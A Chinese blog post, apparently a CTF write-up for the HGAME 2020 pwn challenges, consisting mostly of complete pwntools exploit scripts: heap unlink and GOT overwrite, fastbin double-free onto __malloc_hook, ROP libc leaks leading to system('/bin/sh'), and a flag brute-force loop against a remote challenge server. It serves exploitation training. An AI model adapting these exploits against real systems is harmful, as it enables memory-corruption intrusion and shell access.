hg2020 pwn

原創 doudoudedi 2020-02-25 00:51

打了我就記錄一下
(有點記不太清了有點久了~~)

Annevi

這道題是做2次unlink然後寫got表即可

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./Annevi')
	elf=ELF('./Annevi')
	libc=elf.libc
else:
	p=remote('47.103.214.163',20301)
	elf=ELF('./Annevi')
	libc=elf.libc

def add(size,content):
	p.sendlineafter(':','1')
	p.sendlineafter('?',str(size))
	p.sendlineafter('content:',content)

def delete(idx):
	p.sendlineafter(':','2')
	p.sendlineafter('index?',str(idx))

def show(idx):
	p.sendlineafter(':','3')
	p.sendlineafter('index?',str(idx))

def edit(idx,content):
	p.sendlineafter(':','4')
	p.sendlineafter('index?',str(idx))
	p.sendlineafter('content:',content)

def exp():
	add(0x90,'aaaa')#0
	add(0x90,'aaaa')#1
	add(0x90,'bbbb')#2
	add(0x90,'/bin/sh\x00')#3
	add(0x90,'/bin/sh\x00')#4
	payload=p64(0)+p64(0x91)+p64(0x602040-0x18)+p64(0x602040-0x10)+'a'*0x70+p64(0x90)+p64(0xa0)
	edit(0,payload)
	delete(1)
	payload=p64(0)*3+p64(elf.got['atoi'])
	edit(0,payload)
	show(0)
	libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['atoi']
	system=libcbase+libc.sym['system']
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	free_hook=libcbase+libc.sym['__free_hook']
	one_gadget=libcbase+0xf1147
	log.success('libcbase: '+hex(libcbase))
	payload=p64(0)+p64(0x91)+p64(0x602050-0x18)+p64(0x602050-0x10)+'a'*0x70+p64(0x90)+p64(0xa0)
	edit(2,payload)
	delete(3)
	payload=p64(0)+p64(free_hook)
	edit(2,payload)
	edit(0,p64(system))
	show(0)
	p.interactive()

if __name__=="__main__":
	exp()

Another_Heaven

截斷爆破我記得用了好久

from pwn import *
#p=process('./Another_Heaven')
for j in range(97,127):
	p=remote('47.103.214.163',21001)
	p.recvuntil('!"')
	payload=str(0x602160+43)
	p.sendline(payload)
	sleep(0.2)
	p.send('\x00')
	p.recvuntil(':')
	p.sendline('E99p1ant')
	p.recvuntil(':')
	payload='hgame{VGhlX2Fub3RoZXJfd2F5X3RvX2hlYXZlbg=='
	payload=payload+chr(j)
	p.sendline(payload)
	replay=p.recv()
	if 'Welcome' in replay:
		print "yes!!!"+payload
		break
	#p.interactive()
print payload
#hgame{VGh

Hard_AAAAA

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./Hard_AAAAA')
	elf=ELF('./Hard_AAAAA')
else:
	p=remote('47.103.214.163',20000)

def exp():
	p.recvuntil('!')
	payload='a'*(0xac-0x31)+'0O0o\x00O0'
	p.sendline(payload)
	p.interactive()

if __name__=="__main__":
	exp()

One_Shot

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./One_Shot')
else:
	p=remote('47.103.214.163',20002)
def exp():
	p.recvuntil('?')
	payload='a'*0x20
	p.sendline(payload)
	p.recvuntil('shot!')
	p.sendline(str(0x06010E0))
	p.interactive()

if __name__=="__main__":
	exp()

ROP_LEVEL0

#!/usr/bin/python2
from pwn import *
local=0
if local==1:
	p=process('./ROP_LEVEL0')
	elf=ELF('./ROP_LEVEL0')
	libc=elf.libc

else:
	p=remote('47.103.214.163',20003)
	elf=ELF('./ROP_LEVEL0')
	libc=elf.libc

def exp():
	pop_rdi=0x400753
	p.recvuntil('./flag')
	payload='a'*0x50+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x40065B)
	p.send(payload)
	put=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	libcbase=put-libc.sym['puts']
	system=libcbase+libc.sym['system']
	bin_sh=libcbase+libc.search('/bin/sh').next()
	p.recvuntil('./flag')
	payload='a'*0x50+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system)+p64(0)
	p.send(payload)
	p.interactive()

if __name__=="__main__":
	exp()

Roc826

先改指針leak然後正常打malloc_hook

#!/usr/bin/python2
from pwn import *
local=1
if local==1:
	p=process('./Roc826')
	elf=ELF('./Roc826')
	libc=elf.libc
else:
	p=remote('47.103.214.163',21002)
	elf=ELF('./Roc826')
	libc=elf.libc

def add(size,content):
	p.sendlineafter(':','1')
	p.sendlineafter('size?',str(size))
	p.sendlineafter('content:',content)

def delete(idx):
	p.sendlineafter(':','2')
	p.sendlineafter('index?',str(idx))

def show(idx):
	p.sendlineafter(':','3')
	p.sendlineafter('index?',str(idx))

lg=lambda address,data:log.success('%s: '%(address)+hex(data))

def exp():
	add(0x50,'doudou0') #0
	add(0x40,'douodu1') #1
	add(0x40,'doudou5') #2
	add(0x68,'doudou2') #3
	add(0x68,'doudou3') #4
	add(0x18,'doudou4') #5
	delete(3)
	delete(4)
	delete(3)
	add(0x68,p64(0x60208d))
	add(0x68,'dd0')
	add(0x68,'dd1')
	add(0x60,p64(0)*2+'\xaa\xaa\xaa'+p64(elf.got['puts']))
	show(2)
	put=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	libcbase=put-libc.sym['puts']
	o_g=[0x45216,0x4526a,0xf02a4,0xf1147]
	malloc_hook=libcbase+libc.sym['__malloc_hook']
	one_gadget=libcbase+o_g[3]
	lg('libcbase',libcbase)
	delete(6)
	delete(7)
	delete(6)
	add(0x68,p64(malloc_hook-0x23))
	add(0x68,'su')
	add(0x68,'su1')
	add(0x68,'a'*19+p64(one_gadget))
	show(8)
	p.sendlineafter(':','1')
	p.sendlineafter('size?',str(1))
	p.interactive()
if __name__=="__main__":
	exp()
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

linux pwn練習0x01

文章目錄doubly_dangerousWarmUp關於確定溢出點的一種方法:gdb-peda關於利用ret調用shellcode函數調用方式的基本介紹pwn1just_do_it 題目 doubly_dangerous 內

yusakul 2020-07-07 13:34:36

linux pwn練習0x02

文章目錄tyro_shellcode tyro_shellcode OpenCTF : tyro_shellcode Baby’s first shellcode problem. Server: 172.31.1.43:161

yusakul 2020-07-07 13:34:36

XCTF進階區Crypto之flag_in_your_hand write up

下載下來查看html源碼和js源碼: <html> <head> <title>Flag in your Hand</title> <style type="text/css"> body { padding-

KogRow 2020-07-07 15:59:18

docker搭建pwn環境

文章目錄拉取ubuntu鏡像運行容器安裝環境修改apt源修改pip源安裝pwntools安裝pwndbg安裝ROPgadget、libc-database、one_gadget安裝tmux與主機拷貝文件保存容器爲新鏡像示例補充添加

yusakul 2020-07-07 13:34:36

SCTF2020

Snake 在輸入的地方有一次off by one的機會通過構造堆塊重疊然後做2次double free改寫got拿到shell exp: from pwn import * p=remote('39.107.244.116',9

doudoudedi 2020-07-06 14:30:05

防災科技學院GKCTF2020_misc wp

GKCTF_2020_misc0x01 簽到0x02 問卷調查0x03 Pokémon0x04 code obfuscation0x05 Harley Quinn0x06 Sail a boat down the river

marsxu626 2020-07-05 17:07:42

HITCON-Training lab5(自己構造rop)

看到靜態鏈接,一頓欣喜,直接ropchain生成,棧溢出找出來就ok啦?然後後來發現並沒有那麼簡單。。。 =================================================================

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab7(一道簡單的格式化字符串讀漏洞)

格式化字符串知道他的操作,可是做的一點也不熟練吧,,,BJDCTF上的r2t4不會啊,,,看不懂,,,所以就來補補格式化字符串的題目了,,,,   看到canary開啓了,我還以爲要泄漏canary呢,結果發現不用那麼麻煩,,, 其實

言承Yolanda 2020-07-08 01:37:40

HITCON-Training lab8(格式化字符串寫漏洞)

還在補格式化字符串漏洞的知識,,,,看到這道題的時候,有點懵,,,因爲發現218不會整,,,看官方writeup也不太行,,,   先知社區上有篇講的就很好了,,,nice,用了四種方法(最後一種沒看懂,,,),,,看完,BJDCTF那道

言承Yolanda 2020-07-08 01:37:40

BJDCTF 2nd - Pwn(r2t3、one_gadget、r2t4)

r2t3 最簡單的一道題,可是我竟然沒有做出來,無語了,,, 文件保護沒啥好說的,,,很正常 進入name_check函數 255 ==> 255 256 ==> 0,257 ==> 1,258 ==> 2,259 ==> 3, 2

言承Yolanda 2020-07-08 01:37:40

棧遷移學習(buuctf [Black Watch 入羣題])

i春秋的borrowstack是棧遷移和萬能gadget的混合,,,然後writeup看的不是很明白,也沒有很細的解析,所以,emmm,應該是自己棧遷移學的不是很好,只是知道大概的意思,但是還沒有做過題,這次在看雪看到文章,就好好學一下,

言承Yolanda 2020-07-08 01:37:40

BUUCTF刷題(前12道)

哈哈哈,我又來刷題了,看了下BUUCTF上面的pwn題還真多。。。 test_your_nc ida查看,發現直接執行system,所以,直接交互就可以 //寫下簡單的腳本 from pwn import * p = remote('

言承Yolanda 2020-07-08 01:37:40

逆向入門筆記之分析TraceMe.exe

TraceMe.exe是一個示例程序,用於逆向的學習,簡單地模擬了註冊機制。 我們把它拖進IDA中無腦F5一波: 雙擊DialogFunc進入這個函數: BOOL __stdcall DialogFunc(HWND hWnd, UIN

KogRow 2020-07-07 15:59:23

已知libc地址爆破TLS、ld.so等地址

已知libc地址爆破TLS、ld.so等地址 在大多數情況下,遠程的ld.so以及TLS等結構的地址與libc地址之間的偏移與本地的會不一樣,但是大致處於一個範圍內,並且,在同一個系統裏,這個差值是固定的,其差值的變化往往在偏移的第1.5

haivk 2020-07-05 02:32:56

ACTF_2019_ACTFNOTE(top chunk上移)

ACTF_2019_ACTFNOTE 首先,檢查一下程序的保護機制 然後,我們用IDA分析一下,edit裏存在溢出,可以直接修改top chunk的size 那麼只需要把top chunk的size修改爲-1,然後malloc(負數)

haivk 2020-07-05 02:32:56